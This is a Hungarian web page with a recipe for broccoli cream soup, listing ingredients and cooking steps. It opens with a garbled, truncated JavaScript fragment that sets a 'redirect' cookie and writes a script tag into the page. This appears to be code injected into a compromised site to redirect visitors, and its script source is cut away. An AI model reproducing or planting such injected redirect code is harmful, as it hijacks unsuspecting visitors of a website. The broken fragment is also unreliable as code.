=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('< \/script>')}"/>



NEKÜNKSZÓL VÁROSOK


BUDAPEST    DEBRECEN    KECSKEMÉT    PÉCS    SOPRON    SZEGED    SZOLNOK

Brokkoli krémleves

Potter


brokkolikrémleves

Hozzávalók :

50 dkg brokkoli

1 fej vöröshagyma

1 fej lila hagyma

2 szelet szalonna

olaj

húsleveskocka

1 dl tejszín

10 dkg gouda sajt

őrölt bors

Elkészítés:

A brokkolit rózsáira szedjük, megmossuk és felszeleteljük. A hagymákat apró kockákra vágjuk és olajban üvegesre pároljuk,hozzáadjuk a felszeletelt szalonnát, majd a brokkolit is, amit rövid ideig párolunk még. 1 liter vízzel felontjuk, majd amikor forr a víz, beledobjuk a húsleveskockát (2db) és a tejszínt, majd lefedve 10-15 percig főzzük. A sajtot durvára reszeljük. A levest mixerrel is lehet pépesíteni, aki nem szereti a nagy zöldség darabokat benne. Sózzuk, borsozzuk.Egy tányérba merve a levest a maradék sajttal megszórjuk.

 






HOZZÁSZÓLÁSOK»



Cikk bejelentése



Írjon Ön is,írj te is magazinunkba!